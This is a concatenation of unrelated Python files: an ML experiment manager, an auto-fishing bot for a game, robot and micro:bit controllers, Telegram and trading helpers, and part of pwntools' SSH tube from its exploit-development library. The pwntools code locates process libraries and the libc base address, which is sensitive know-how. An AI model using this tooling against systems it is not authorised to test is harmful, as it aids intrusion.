'size': asks1[0][1]
}
},
dict(id=x and x.get('id', None), stock='DEF', timestamp=str(t), top_bid=bids2 and {
'price': bids2[0][0],
'size': bids2[0][1]
}, top_ask=asks2 and {
'price': asks2[0][0],
'size': asks2[0][1]
})]
################################################################################
#
# Main
if __name__ == '__main__':
if not os.path.isfile('test.csv'):
print("No data found, generating...")
generate_csv()
run(App())
|
manager.py
|
import argparse
import ast
import copy
import datetime
from enum import Enum
from mlworkflow import lazyproperty as cached_property
import multiprocessing
import itertools
import logging
import os
import time
import astunparse
from mlworkflow import SideRunner
from experimentator import DummyExperiment
from .utils import find, mkdir, NestablePool
from .callbacked_experiment import FailedTrainingError
# pylint: disable=logging-fstring-interpolation, logging-format-interpolation
def product_kwargs(**kwargs):
try:
kvs = [[(k, v) for v in kwargs[k]] for k in kwargs]
except BaseException as e:
raise SyntaxError(f"Error parsing: {kwargs}") from e
yield from [dict(kv) for kv in itertools.product(*kvs)]
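# Illustrative example (parameter names are hypothetical):
#   product_kwargs(lr=[0.1, 0.01], batch_size=[32]) yields
#   {'lr': 0.1, 'batch_size': 32} and {'lr': 0.01, 'batch_size': 32},
# i.e. the full cartesian product of the grid values.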
def update_ast(tree, overwrite, allow_double_assignation=False, allow_tuple_assignation=False):
met_targets = []
for node in tree.body:
if not isinstance(node, ast.Assign):
continue
for target in node.targets:
if hasattr(target, "id"):
assert allow_tuple_assignation or isinstance(target, ast.Name), "Tuple assignation is not allowed in config files (e.g. `a,b=1,2`). Impossible to overwrite '{}' of type '{}'".format(target.id, type(target))
assert allow_double_assignation or target.id not in met_targets, "Double assignation is not allowed in config files. '{}' seems to be assigned twice.".format(target.id)
if target.id in overwrite:
node.value = ast.parse(repr(overwrite.pop(target.id))).body[0].value
met_targets.append(target.id)
# Add remaining keys
for key, value in overwrite.items():
tree.body.append(ast.Assign([ast.Name(id=key, ctx=ast.Store())], ast.Constant(value, kind=None)))
ast.fix_missing_locations(tree)
return overwrite
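# Usage sketch (illustrative): given tree = ast.parse("lr = 0.1"),
# update_ast(tree, {"lr": 0.01, "epochs": 5}) rewrites the existing lr
# assignment in place, appends an "epochs = 5" assignment for the key without a
# matching target, and returns that leftover {"epochs": 5} dict (reported later
# as "Un-overwritten" kwargs).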
def parse_config_str(config_str):
config = {}
exec(config_str, None, config) # pylint: disable=exec-used
return config
def parse_config_file(config_filename):
with open(config_filename, "r") as f:
config = parse_config_str(f.read())
return config
def get_worker_id(*_):
time.sleep(.1)
return os.getpid()
def set_cuda_visible_device(index):
time.sleep(.1)
os.environ["CUDA_VISIBLE_DEVICES"] = os.environ["CUDA_VISIBLE_DEVICES"].split(',')[index]
def build_experiment(config_filename, **kwargs):
with open(find(config_filename)) as f:
tree = ast.parse(f.read())
update_ast(tree, dict({**kwargs, "filename": config_filename}), allow_double_assignation=True)
config_str = astunparse.unparse(tree)
config = parse_config_str(config_str)
return type("Exp", tuple(config["experiment_type"][::-1]), {})(config)
class JobStatus(Enum):
TODO = 0
BUSY = 1
FAIL = 2
DONE = 3
class Job():
def __init__(self, filename, config_tree, dummy=False, grid_sample=None):
self.filename = filename
self.dummy = dummy
self.config_tree = config_tree
self.grid_sample = grid_sample or {}
self.status = JobStatus.TODO
def update_ast(self, **kwargs):
return update_ast(self.config_tree, dict(kwargs)) # dict() makes a copy
@property
def config_str(self):
return astunparse.unparse(self.config_tree)
@cached_property
def config(self):
config = {}
exec(self.config_str, None, config) # pylint: disable=exec-used
return {**config, "grid_sample": self.grid_sample, "filename": self.filename}
@cached_property
def exp(self):
if self.dummy:
self.config["experiment_type"].append(DummyExperiment)
return type("Exp", tuple(self.config["experiment_type"][::-1]), {})(self.config)
def run(self, epochs, keep=True, worker_ids=None, **runtime_cfg):
project_name = runtime_cfg.get("project_name", os.path.splitext(os.path.basename(self.filename))[0])
experiment_id = datetime.datetime.now().strftime("%Y%m%d_%H%M%S.%f")
worker_index = worker_ids[get_worker_id()] if worker_ids else 0
# Update config tree with runtime config
unoverwritten = self.update_ast(**runtime_cfg, epochs=epochs)
if unoverwritten:
logging.warning("Un-overwritten runtime kwargs: {}".format(list(unoverwritten.keys())))
# Write config string to file
folder = os.path.join(os.getenv("RESULTS_FOLDER", "."), project_name, experiment_id)
mkdir(folder)
filename = os.path.join(folder, "config.py")
with open(filename, "w") as f:
f.write(self.config_str)
# Add run and project names
self.config.update(project_name=project_name, experiment_id=experiment_id, worker_index=worker_index, folder=folder, dummy=self.dummy)
# Launch training
try:
self.status = JobStatus.BUSY
self.exp.logger.info(f"{project_name}.{experiment_id} doing {self.grid_sample}")
self.exp.train(epochs=epochs)
except FailedTrainingError as e:
self.status = JobStatus.FAIL
self.exp.logger.warning(f"{project_name}.{experiment_id} failed with NaNs")
except BaseException as e:
self.status = JobStatus.FAIL
self.exp.logger.exception(f"{project_name}.{experiment_id} failed")
if isinstance(e, KeyboardInterrupt):
raise e
else:
self.status = JobStatus.DONE
self.exp.logger.info(f"{project_name}.{experiment_id} done")
if not keep:
del self.exp
class ExperimentManager():
side_runner = None
def __init__(self, filename, logfile=None, num_workers=0, dummy=False, **grid_search):
self.logger = logging.getLogger("experimentator")
if logfile:
handler = logging.FileHandler(logfile, mode="w")
handler.setFormatter(logging.Formatter("[worker#%(threadName)s] %(asctime)s [%(levelname)s]%(filename)s:%(lineno)d: %(message)s"))
handler.setLevel(logging.INFO if num_workers > 0 else logging.DEBUG)
self.logger.addHandler(handler)
self.logger.setLevel(logging.INFO if num_workers > 0 else logging.DEBUG)
#threading.current_thread().name = "main"
if num_workers > 0:
self.side_runner = SideRunner(num_workers, impl=multiprocessing.Pool)#, impl=NestablePool)
if "CUDA_VISIBLE_DEVICES" in os.environ and len(os.environ["CUDA_VISIBLE_DEVICES"].split(",")) == num_workers and num_workers > 1:
self.side_runner.pool.map(set_cuda_visible_device, range(len(self.side_runner)))
with open(find(filename)) as f:
tree = ast.parse(f.read())
if not grid_search:
self.jobs = [Job(filename, config_tree=tree, dummy=dummy)]
else:
self.jobs = []
unoverwritten = {}
for grid_sample in product_kwargs(**grid_search):
job = Job(filename, config_tree=copy.deepcopy(tree), dummy=dummy, grid_sample=grid_sample)
unoverwritten.update(**job.update_ast(**grid_sample))
self.jobs.append(job)
if unoverwritten:
self.logger.warning("Un-overwritten kwargs: {}".format(list(unoverwritten.keys())))
@cached_property
def worker_ids(self):
if not self.side_runner:
return {get_worker_id():0}
seq = range(len(self.side_runner))
return dict(zip(self.side_runner.pool.map(get_worker_id, seq), seq))
def execute(self, epochs, **runtime_cfg):
self.logger.info(f"Runtime config: {runtime_cfg}")
for job in self.jobs:
if job.status == JobStatus.TODO:
if self.side_runner:
self.side_runner.run_async(Job.run, job, epochs=epochs, keep=False, worker_ids=self.worker_ids, **runtime_cfg)
else:
#p = multiprocessing.Process(target=job.run, args=(epochs, False), kwargs=runtime_cfg)
#p.start()
#p.join()
job.run(epochs=epochs, keep=False, **runtime_cfg) # pylint: disable=expression-not-assigned
if self.side_runner:
self.side_runner.collect_runs()
def main():
parser = argparse.ArgumentParser(description="Experimentation library", prog="experimentator")
parser.add_argument("filename")
parser.add_argument("--epochs", type=int)
parser.add_argument('--logfile', type=str, default=None)# type=argparse.FileType('w', encoding='UTF-8')
parser.add_argument("--workers", type=int, default=0)
parser.add_argument('--grid', nargs="*")
parser.add_argument('--kwargs', nargs="*", action='append')
parser.add_argument('--dummy', default=False, action='store_true')
args = parser.parse_args()
# TODO: to be protected inside the if __name__ == '__main__' clause of the main module.
#multiprocessing.set_start_method("spawn")
grid = {}
for arg in args.grid or []:
exec(arg, None, grid) # pylint: disable=exec-used
kwargs = {}
for kwarg in [kwarg for kwargs in args.kwargs or [[]] for kwarg in kwargs]: # Flattened appended kwargs
exec(kwarg, None, kwargs) # pylint: disable=exec-used
num_subprocesses = 0 if args.workers <= 1 else args.workers
manager = ExperimentManager(args.filename, logfile=args.logfile, num_workers=num_subprocesses, dummy=args.dummy, **grid)
manager.execute(args.epochs, **kwargs)
# def dump(self, filename="joblist.index"):
# # Write index
# #index_filename = os.path.join(self.folder, os.path.splitext(self.basename)[0] + self.datetime_suffix + ".index")
# with open(filename, "a+") as f:
# for job in self.jobs:
# f.write("[{}]\t{}\t{}\n".format(job.status, job.filename, str(job.grid_sample)))
# print(f"job list successfully written to {filename}")
# @classmethod
# def load(cls, filename="joblist.index"):
# worker_id = datetime.datetime.now().strftime("%Y%m%d_%H%M%S")
# # Get job
# line = find_and_replace_wrapper(filename,
# lambda l: l.startswith("[TODO]"),
# lambda l: l.replace("[TODO]","[BUSY]").replace("\n","\t{}\n".format(worker_id))
# )
# if not line:
# print("nothing to do")
# return
# # Launch job
# try:
# _, filename, grid_sample = line.replace("\n","").split("\t")
# grid_sample = ast.literal_eval(grid_sample)
# run_job(filename, grid_sample=grid_sample, worker_id=worker_id, **kwargs)
# except:
# # Notify failure
# find_and_replace_wrapper(index_filename,
# lambda l: l.startswith("[BUSY]") and l.endswith(worker_id+"\n"),
# lambda l: l.replace("[BUSY]","[TODO]").replace("\t"+worker_id,"")
# )
# raise
# else:
# # Finish job
# line = find_and_replace_wrapper(index_filename,
# lambda l: l.startswith("[BUSY]") and l.endswith(worker_id+"\n"),
# lambda l: l.replace("[BUSY]","[DONE]")
# )
# def find_and_replace_wrapper(filename, search_expr, action_expr):
# with fileinput.FileInput(filename, inplace=True, backup='.bak') as file:
# output = None
# for line in file:
# if search_expr(line):
# print(action_expr(line), end="")
# output = line
# else:
# print(line, end="")
# return output
|
engine.py
|
import logging
import math
import time
import traceback
from threading import Thread
import cv2
from pynput import keyboard, mouse
from fishy.constants import fishyqr, lam2, libgps
from fishy.engine import SemiFisherEngine
from fishy.engine.common.IEngine import IEngine
from fishy.engine.common.window import WindowClient
from fishy.engine.fullautofisher.mode.calibrator import Calibrator
from fishy.engine.fullautofisher.mode.imode import FullAutoMode
from fishy.engine.fullautofisher.mode.player import Player
from fishy.engine.fullautofisher.mode.recorder import Recorder
from fishy.engine.common.qr_detection import (get_qr_location,
get_values_from_image, image_pre_process)
from fishy.engine.semifisher import fishing_event, fishing_mode
from fishy.engine.semifisher.fishing_mode import FishingMode
from fishy.helper import helper, hotkey
from fishy.helper.config import config
from fishy.helper.helper import log_raise, wait_until, is_eso_active
from fishy.helper.helper import sign
mse = mouse.Controller()
kb = keyboard.Controller()
class FullAuto(IEngine):
rotate_by = 30
def __init__(self, gui_ref):
from fishy.engine.fullautofisher.test import Test
super().__init__(gui_ref)
self._curr_rotate_y = 0
self.fisher = SemiFisherEngine(None)
self.calibrator = Calibrator(self)
self.test = Test(self)
self.show_crop = False
self.mode = None
def run(self):
self.gui.bot_started(True)
self.window = WindowClient(color=cv2.COLOR_RGB2GRAY, show_name="Full auto debug")
self.mode = None
if config.get("calibrate", False):
self.mode = Calibrator(self)
elif FullAutoMode(config.get("full_auto_mode", 0)) == FullAutoMode.Player:
self.mode = Player(self)
elif FullAutoMode(config.get("full_auto_mode", 0)) == FullAutoMode.Recorder:
self.mode = Recorder(self)
if not is_eso_active():
logging.info("Waiting for eso window to be active...")
wait_until(lambda: is_eso_active() or not self.start)
if self.start:
logging.info("starting in 2 secs...")
time.sleep(2)
# noinspection PyBroadException
try:
if self.window.get_capture() is None:
log_raise("Game window not found")
self.window.crop = get_qr_location(self.window.get_capture())
if self.window.crop is None:
log_raise("FishyQR not found, try to drag it around and try again")
if not (type(self.mode) is Calibrator) and not self.calibrator.all_calibrated():
log_raise("you need to calibrate first")
self.fisher.toggle_start()
fishing_event.unsubscribe()
if self.show_crop:
self.start_show()
if config.get("tabout_stop", 1):
self.stop_on_inactive()
self.mode.run()
except Exception:
traceback.print_exc()
self.start = False
self.gui.bot_started(False)
self.window.show(False)
logging.info("Quitting")
self.window.destory()
self.fisher.toggle_start()
def start_show(self):
def func():
while self.start and WindowClient.running():
self.window.show(self.show_crop, func=image_pre_process)
Thread(target=func).start()
def stop_on_inactive(self):
def func():
wait_until(lambda: not is_eso_active())
self.start = False
Thread(target=func).start()
def get_coords(self):
"""
        There is a chance that this function returns None instead of QR coordinates;
        callers need to handle that case manually.
        todo: find a better way of handling None: switch from the start bool to a state which knows
        todo: it is waiting for the QR and doesn't block the engine when commanded to close
"""
img = self.window.processed_image(func=image_pre_process)
return get_values_from_image(img)[:3]
def move_to(self, target) -> bool:
current = self.get_coords()
if not current:
return False
print(f"Moving from {(current[0], current[1])} to {target}")
move_vec = target[0] - current[0], target[1] - current[1]
dist = math.sqrt(move_vec[0] ** 2 + move_vec[1] ** 2)
print(f"distance: {dist}")
if dist < 5e-05:
print("distance very small skipping")
return True
target_angle = math.degrees(math.atan2(-move_vec[1], move_vec[0])) + 90
from_angle = current[2]
if not self.rotate_to(target_angle, from_angle):
return False
walking_time = dist / self.calibrator.move_factor
print(f"walking for {walking_time}")
kb.press('w')
time.sleep(walking_time)
kb.release('w')
print("done")
return True
def rotate_to(self, target_angle, from_angle=None) -> bool:
if from_angle is None:
coords = self.get_coords()
if not coords:
return False
_, _, from_angle = coords
if target_angle < 0:
target_angle = 360 + target_angle
while target_angle > 360:
target_angle -= 360
print(f"Rotating from {from_angle} to {target_angle}")
angle_diff = target_angle - from_angle
if abs(angle_diff) > 180:
angle_diff = (360 - abs(angle_diff)) * sign(angle_diff) * -1
rotate_times = int(angle_diff / self.calibrator.rot_factor) * -1
print(f"rotate_times: {rotate_times}")
for _ in range(abs(rotate_times)):
mse.move(sign(rotate_times) * FullAuto.rotate_by * -1, 0)
time.sleep(0.05)
return True
def look_for_hole(self) -> bool:
valid_states = [fishing_mode.State.LOOKING, fishing_mode.State.FISHING]
_hole_found_flag = FishingMode.CurrentMode in valid_states
if not config.get("look_for_hole", 1):
return _hole_found_flag
t = 0
while not _hole_found_flag and t <= 2.5:
direction = -1 if t > 1.25 else 1
mse.move(0, FullAuto.rotate_by*direction)
time.sleep(0.05)
t += 0.05
_hole_found_flag = FishingMode.CurrentMode in valid_states
self._curr_rotate_y = t
return _hole_found_flag
def rotate_back(self):
while self._curr_rotate_y > 0.01:
mse.move(0, -FullAuto.rotate_by)
time.sleep(0.05)
self._curr_rotate_y -= 0.05
def toggle_start(self):
self.start = not self.start
if self.start:
self.thread = Thread(target=self.run)
self.thread.start()
if __name__ == '__main__':
logging.getLogger("").setLevel(logging.DEBUG)
hotkey.initalize()
# noinspection PyTypeChecker
bot = FullAuto(None)
bot.toggle_start()
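# Illustrative sketch (not part of the fishy codebase): the shortest-path
# rotation math used by FullAuto.rotate_to above, isolated as a pure function.
# rot_factor is assumed to be the calibrated degrees per mouse step; the sign
# flip mirrors the mouse-x convention in rotate_to.
def _steps_to_rotate(from_angle, target_angle, rot_factor):
    """Return the signed number of mouse steps needed to face target_angle."""
    target_angle %= 360                             # normalize into [0, 360)
    diff = target_angle - from_angle
    if abs(diff) > 180:                             # take the shorter way around
        diff = (360 - abs(diff)) * (1 if diff > 0 else -1) * -1
    return int(diff / rot_factor) * -1              # e.g. _steps_to_rotate(10, 350, 5) == 4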
|
pithon.py
|
from threading import Thread
from lib.alphabot import AlphaBot2
from lib.buzzer import beep_on, beep_off
from lib.led import led
from lib.ultrasonic import distance
from lib.infrared import get_key
from util.state import State
class Pithon:
def __init__(self):
# drive
self.drive = AlphaBot2()
# state
self.state = State.set_param
# pwm
self.PWM = 50
# buzzer
self.beep = False
def exec(self, key):
if self.state == State.set_param:
return
if key == 0:
if self.state == State.auto_run:
dis = distance()
print(dis)
if dis <= 20:
self.drive.right()
else:
self.drive.forward()
return
# manual
        # forward / backward / turn left / turn right / stop / speed up / slow down
last = self.state
self.state = State.manual
if key == 0x18:
self.drive.forward()
elif key == 0x08:
self.drive.left()
elif key == 0x1c:
self.drive.stop()
elif key == 0x5a:
self.drive.right()
elif key == 0x52:
self.drive.backward()
elif key == 0x15:
# speed up
if self.PWM + 10 < 101:
self.PWM += 10
self.drive.setPWMA(self.PWM)
self.drive.setPWMB(self.PWM)
print(self.PWM)
elif key == 0x07:
# slow down
if self.PWM - 10 > -1:
self.PWM = self.PWM - 10
self.drive.setPWMA(self.PWM)
self.drive.setPWMB(self.PWM)
print(self.PWM)
else:
self.state = last
def listen(self):
key = get_key()
if key is None:
self.exec(0)
return 0
print("key num: " + str(key))
if key == 70:
return 1
if self.state == State.set_param:
if key == 69:
led()
pass
if key == 71:
if self.beep is False:
beep_on()
self.beep = True
else:
beep_off()
self.beep = False
if key == 67:
self.state = State.auto_run
self.PWM = 15
self.drive.setPWMA(self.PWM)
self.drive.setPWMB(self.PWM)
elif self.state == State.auto_run:
if key == 67:
self.state = State.set_param
self.drive.stop()
else:
self.state = State.manual
self.exec(key)
else:
print("manual")
if key == 67:
self.state = State.set_param
self.drive.stop()
else:
self.exec(key)
return 0
def listen_wrapper(self):
while self.listen() != 1:
# print(self.state)
pass
def start(self):
t = Thread(target=self.listen_wrapper)
t.start()
t.join()
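# Illustrative sketch (not part of this robot project): the auto-run decision
# in Pithon.exec reduces to a threshold check on the ultrasonic reading: turn
# right when an obstacle is within 20 (assumed to be centimetres), otherwise
# keep driving forward.
def _auto_run_action(dist, threshold=20):
    """Return the drive action the auto-run mode would take for a reading."""
    return 'right' if dist <= threshold else 'forward'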
|
speed_pc.py
|
import mbhandler
import getch
import threading
import queue
key = queue.Queue()
RUNNING = True
def keypress():
global RUNNING
while RUNNING:
try:
k = getch.getch()
try:
key.put(k)
            except queue.Full:
pass
except KeyboardInterrupt:
RUNNING = False
except EOFError:
RUNNING = False
keyThread = threading.Thread(target=keypress)
keyThread.daemon = True
keyThread.start()
mbhandler.init(output="raw")
listening = False
spin = ["|","/","-","\\"]
spinIndex = 0
print("Press <ENTER> to start")
try:
while RUNNING:
if not key.empty():
k = key.get()
if k == "\n":
listening = True
else:
if listening:
print("\rWaiting: " + spin[spinIndex], end='')
spinIndex += 1
spinIndex %= 4
if not mbhandler.queue.empty():
msg = mbhandler.queue.get()
if listening:
print("\n" + msg + " pressed first")
print("Press <ENTER> to start")
listening = False
except KeyboardInterrupt:
pass
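# Illustrative sketch (defined only, never called by this script): the
# unbounded queue.Queue() used above never raises queue.Full, so the except
# branch in keypress() is effectively dead. With a bounded queue, the same
# "drop keys when the buffer is full" idea would look like this (maxsize is
# an arbitrary illustrative value):
def _bounded_put_demo(q_maxsize=16):
    bounded = queue.Queue(maxsize=q_maxsize)
    try:
        bounded.put_nowait("x")      # non-blocking put
    except queue.Full:
        pass                         # drop the key instead of blocking
    return bounded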
|
static.py
|
import sqlite3
import zipfile
import datetime
import telegram
import pandas as pd
from threading import Thread
from utility.setting import db_stg, openapi_path
try:
connn = sqlite3.connect(db_stg)
df_tg = pd.read_sql('SELECT * FROM telegram', connn)
connn.close()
except pd.io.sql.DatabaseError:
bot = ''
user_id = 0
else:
bot = df_tg['str_bot'][0]
user_id = int(df_tg['int_id'][0])
def telegram_msg(text):
if bot == '':
        print('텔레그램 봇이 설정되지 않아 메세지를 보낼 수 없습니다.')  # "The Telegram bot is not configured, so the message cannot be sent."
else:
try:
telegram.Bot(bot).sendMessage(chat_id=user_id, text=text)
except Exception as e:
            print(f'텔레그램 설정 오류 알림 - telegram_msg {e}')  # "Telegram configuration error alert - telegram_msg {e}"
def thread_decorator(func):
def wrapper(*args):
Thread(target=func, args=args, daemon=True).start()
return wrapper
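# Illustrative sketch (hypothetical usage, safe to remove): thread_decorator
# above runs the wrapped function on a daemon thread and discards its return
# value; note that only positional arguments are forwarded.
@thread_decorator
def _send_alert_in_background(text):
    telegram_msg(text)  # runs off the main thread; errors are printed inside telegram_msg
# _send_alert_in_background('collector started')  # returns immediately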
def now():
return datetime.datetime.now()
def timedelta_sec(second, std_time=None):
if std_time is None:
next_time = now() + datetime.timedelta(seconds=second)
else:
next_time = std_time + datetime.timedelta(seconds=second)
return next_time
def timedelta_day(day, std_time=None):
if std_time is None:
next_time = now() + datetime.timedelta(days=day)
else:
next_time = std_time + datetime.timedelta(days=day)
return next_time
def strp_time(timetype, str_time):
return datetime.datetime.strptime(str_time, timetype)
def strf_time(timetype, std_time=None):
if std_time is None:
str_time = now().strftime(timetype)
else:
str_time = std_time.strftime(timetype)
return str_time
def comma2int(t):
if ' ' in t:
t = t.split(' ')[1]
if ',' in t:
t = t.replace(',', '')
return int(t)
def float2str3p2(t):
t = str(t)
if len(t.split('.')[0]) == 1:
t = ' ' + t
if len(t.split('.')[0]) == 2:
t = ' ' + t
if len(t.split('.')[1]) == 1:
t += '0'
return t
def float2str2p2(t):
t = str(t)
if len(t.split('.')[0]) == 1:
t = ' ' + t
if len(t.split('.')[1]) == 1:
t += '0'
return t
def readEnc(trcode):
enc = zipfile.ZipFile(f'{openapi_path}/data/{trcode}.enc')
lines = enc.read(trcode.upper() + '.dat').decode('cp949')
return lines
def parseDat(trcode, lines):
lines = lines.split('\n')
start = [i for i, x in enumerate(lines) if x.startswith('@START')]
end = [i for i, x in enumerate(lines) if x.startswith('@END')]
block = zip(start, end)
enc_data = {'trcode': trcode, 'input': [], 'output': []}
for start, end in block:
block_data = lines[start - 1:end + 1]
block_info = block_data[0]
block_type = 'input' if 'INPUT' in block_info else 'output'
record_line = block_data[1]
tokens = record_line.split('_')[1].strip()
record = tokens.split('=')[0]
fields = block_data[2:-1]
field_name = []
for line in fields:
field = line.split('=')[0].strip()
field_name.append(field)
fields = {record: field_name}
        if block_type == 'input':
            enc_data['input'].append(fields)
        else:
            enc_data['output'].append(fields)
return enc_data
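# Illustrative sketch (hypothetical data, field names invented): parseDat
# above expects each block to be preceded by a header line containing INPUT
# or OUTPUT, opened by "@START_<record>=..." and closed by "@END...", with one
# "<field>=..." line per field in between. A fragment such as
#
#   <header line containing INPUT>
#   @START_InputRecord=...
#   code=...
#   date=...
#   @END_...
#
# would be parsed into roughly:
#   {'trcode': trcode, 'input': [{'InputRecord': ['code', 'date']}], 'output': []}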
|
ssh.py
|
from __future__ import absolute_import
from __future__ import division
import inspect
import logging
import os
import re
import shutil
import six
import string
import sys
import tarfile
import tempfile
import threading
import time
import types
from pwnlib import term
from pwnlib.context import context
from pwnlib.log import Logger
from pwnlib.log import getLogger
from pwnlib.term import text
from pwnlib.timeout import Timeout
from pwnlib.tubes.sock import sock
from pwnlib.util import hashes
from pwnlib.util import misc
from pwnlib.util import safeeval
from pwnlib.util.sh_string import sh_string
# Kill the warning line:
# No handlers could be found for logger "paramiko.transport"
paramiko_log = logging.getLogger("paramiko.transport")
h = logging.StreamHandler(open(os.devnull,'w+'))
h.setFormatter(logging.Formatter())
paramiko_log.addHandler(h)
class ssh_channel(sock):
#: Parent :class:`ssh` object
parent = None
#: Remote host
host = None
#: Return code, or :const:`None` if the process has not returned
#: Use :meth:`poll` to check.
returncode = None
#: :const:`True` if a tty was allocated for this channel
tty = False
#: Environment specified for the remote process, or :const:`None`
#: if the default environment was used
env = None
#: Command specified for the constructor
process = None
def __init__(self, parent, process = None, tty = False, wd = None, env = None, raw = True, *args, **kwargs):
super(ssh_channel, self).__init__(*args, **kwargs)
# keep the parent from being garbage collected in some cases
self.parent = parent
self.returncode = None
self.host = parent.host
self.tty = tty
self.env = env
self.process = process
self.cwd = wd or '.'
if isinstance(wd, six.text_type):
wd = wd.encode('utf-8')
env = env or {}
msg = 'Opening new channel: %r' % (process or 'shell')
if isinstance(process, (list, tuple)):
process = b' '.join((lambda x:x.encode('utf-8') if isinstance(x, six.text_type) else x)(sh_string(s)) for s in process)
if isinstance(process, six.text_type):
process = process.encode('utf-8')
if process and wd:
process = b'cd ' + sh_string(wd) + b' >/dev/null 2>&1;' + process
if process and env:
for name, value in env.items():
if not re.match('^[a-zA-Z_][a-zA-Z0-9_]*$', name):
self.error('run(): Invalid environment key %r' % name)
export = 'export %s=%s;' % (name, sh_string(value))
if isinstance(export, six.text_type):
export = export.encode('utf-8')
process = export + process
if process and tty:
if raw:
process = b'stty raw -ctlecho -echo; ' + process
else:
process = b'stty -ctlecho -echo; ' + process
# If this object is enabled for DEBUG-level logging, don't hide
# anything about the command that's actually executed.
if process and self.isEnabledFor(logging.DEBUG):
msg = 'Opening new channel: %r' % ((process,) or 'shell')
with self.waitfor(msg) as h:
import paramiko
try:
self.sock = parent.transport.open_session()
except paramiko.ChannelException as e:
if e.args == (1, 'Administratively prohibited'):
self.error("Too many sessions open! Use ssh_channel.close() or 'with'!")
raise e
if self.tty:
self.sock.get_pty('xterm', term.width, term.height)
def resizer():
if self.sock:
try:
self.sock.resize_pty(term.width, term.height)
except paramiko.ssh_exception.SSHException:
pass
self.resizer = resizer
term.term.on_winch.append(self.resizer)
else:
self.resizer = None
# Put stderr on stdout. This might not always be desirable,
# but our API does not support multiple streams
self.sock.set_combine_stderr(True)
self.settimeout(self.timeout)
if process:
self.sock.exec_command(process)
else:
self.sock.invoke_shell()
h.success()
def kill(self):
"""kill()
Kills the process.
"""
self.close()
def recvall(self, timeout = sock.forever):
# We subclass tubes.sock which sets self.sock to None.
#
# However, we need to wait for the return value to propagate,
# which may not happen by the time .close() is called by tube.recvall()
tmp_sock = self.sock
tmp_close = self.close
self.close = lambda: None
timeout = self.maximum if self.timeout is self.forever else self.timeout
data = super(ssh_channel, self).recvall(timeout)
# Restore self.sock to be able to call wait()
self.close = tmp_close
self.sock = tmp_sock
self.wait()
self.close()
# Again set self.sock to None
self.sock = None
return data
def wait(self, timeout=sock.default):
# TODO: deal with timeouts
return self.poll(block=True)
def poll(self, block=False):
"""poll() -> int
Poll the exit code of the process. Will return None, if the
process has not yet finished and the exit code otherwise.
"""
if self.returncode is None and self.sock \
and (block or self.sock.exit_status_ready()):
while not self.sock.status_event.is_set():
self.sock.status_event.wait(0.05)
self.returncode = self.sock.recv_exit_status()
return self.returncode
def can_recv_raw(self, timeout):
with self.countdown(timeout):
while self.countdown_active():
if self.sock.recv_ready():
return True
time.sleep(min(self.timeout, 0.05))
return False
def interactive(self, prompt = term.text.bold_red('$') + ' '):
"""interactive(prompt = pwnlib.term.text.bold_red('$') + ' ')
If not in TTY-mode, this does exactly the same as
        :meth:`pwnlib.tubes.tube.tube.interactive`, otherwise
it does mostly the same.
An SSH connection in TTY-mode will typically supply its own prompt,
thus the prompt argument is ignored in this case.
We also have a few SSH-specific hacks that will ideally be removed
once the :mod:`pwnlib.term` is more mature.
"""
# If we are only executing a regular old shell, we need to handle
# control codes (specifically Ctrl+C).
#
# Otherwise, we can just punt to the default implementation of interactive()
if self.process is not None:
return super(ssh_channel, self).interactive(prompt)
self.info('Switching to interactive mode')
# We would like a cursor, please!
term.term.show_cursor()
event = threading.Event()
def recv_thread(event):
while not event.is_set():
try:
cur = self.recv(timeout = 0.05)
cur = cur.replace(b'\r\n',b'\n')
cur = cur.replace(b'\r',b'')
if cur is None:
continue
elif cur == b'\a':
                        # Ugly hack until term understands bell characters
continue
stdout = sys.stdout
if not term.term_mode:
stdout = getattr(stdout, 'buffer', stdout)
stdout.write(cur)
stdout.flush()
except EOFError:
self.info('Got EOF while reading in interactive')
event.set()
break
t = context.Thread(target = recv_thread, args = (event,))
t.daemon = True
t.start()
while not event.is_set():
if term.term_mode:
try:
data = term.key.getraw(0.1)
except KeyboardInterrupt:
data = [3] # This is ctrl-c
except IOError:
if not event.is_set():
raise
else:
stdin = getattr(sys.stdin, 'buffer', sys.stdin)
data = stdin.read(1)
if not data:
event.set()
else:
data = [six.byte2int(data)]
if data:
try:
self.send(b''.join(six.int2byte(c) for c in data))
except EOFError:
event.set()
self.info('Got EOF while sending in interactive')
while t.is_alive():
t.join(timeout = 0.1)
# Restore
term.term.hide_cursor()
def close(self):
self.poll()
while self.resizer in term.term.on_winch:
term.term.on_winch.remove(self.resizer)
super(ssh_channel, self).close()
def spawn_process(self, *args, **kwargs):
self.error("Cannot use spawn_process on an SSH channel.""")
def _close_msg(self):
self.info('Closed SSH channel with %s' % self.host)
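# Illustrative sketch (not part of pwntools): ssh_channel.__init__ above
# builds the remote command line by prefixing the requested process with, in
# this order of application, a `cd`, one `export` per environment variable,
# and an `stty` call when a raw tty is requested. A simplified str-only
# version of that composition (it omits the sh_string quoting and the
# validation used above):
def _compose_remote_command(process, wd=None, env=None, tty=False, raw=True):
    if wd:
        process = 'cd %s >/dev/null 2>&1;' % wd + process
    for name, value in (env or {}).items():
        process = 'export %s=%s;' % (name, value) + process
    if tty:
        prefix = 'stty raw -ctlecho -echo; ' if raw else 'stty -ctlecho -echo; '
        process = prefix + process
    return process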
class ssh_process(ssh_channel):
#: Working directory
cwd = None
#: PID of the process
#: Only valid when instantiated through :meth:`ssh.process`
pid = None
    #: Executable of the process
#: Only valid when instantiated through :meth:`ssh.process`
executable = None
#: Arguments passed to the process
#: Only valid when instantiated through :meth:`ssh.process`
argv = None
def libs(self):
"""libs() -> dict
Returns a dictionary mapping the address of each loaded library in the
process's address space.
If ``/proc/$PID/maps`` cannot be opened, the output of ldd is used
verbatim, which may be different than the actual addresses if ASLR
is enabled.
"""
maps = self.parent.libs(self.executable)
maps_raw = self.parent.cat('/proc/%d/maps' % self.pid)
for lib in maps:
remote_path = lib.split(self.parent.host)[-1]
for line in maps_raw.splitlines():
if line.endswith(remote_path):
address = line.split('-')[0]
maps[lib] = int(address, 16)
break
return maps
@property
def libc(self):
"""libc() -> ELF
Returns an ELF for the libc for the current process.
If possible, it is adjusted to the correct address
automatically.
"""
from pwnlib.elf import ELF
for lib, address in self.libs().items():
if 'libc.so' in lib:
e = ELF(lib)
e.address = address
return e
@property
def elf(self):
"""elf() -> pwnlib.elf.elf.ELF
Returns an ELF file for the executable that launched the process.
"""
import pwnlib.elf.elf
libs = self.parent.libs(self.executable)
for lib in libs:
# Cannot just check "executable in lib", see issue #1047
if lib.endswith(self.executable):
return pwnlib.elf.elf.ELF(lib)
@property
def corefile(self):
import pwnlib.elf.corefile
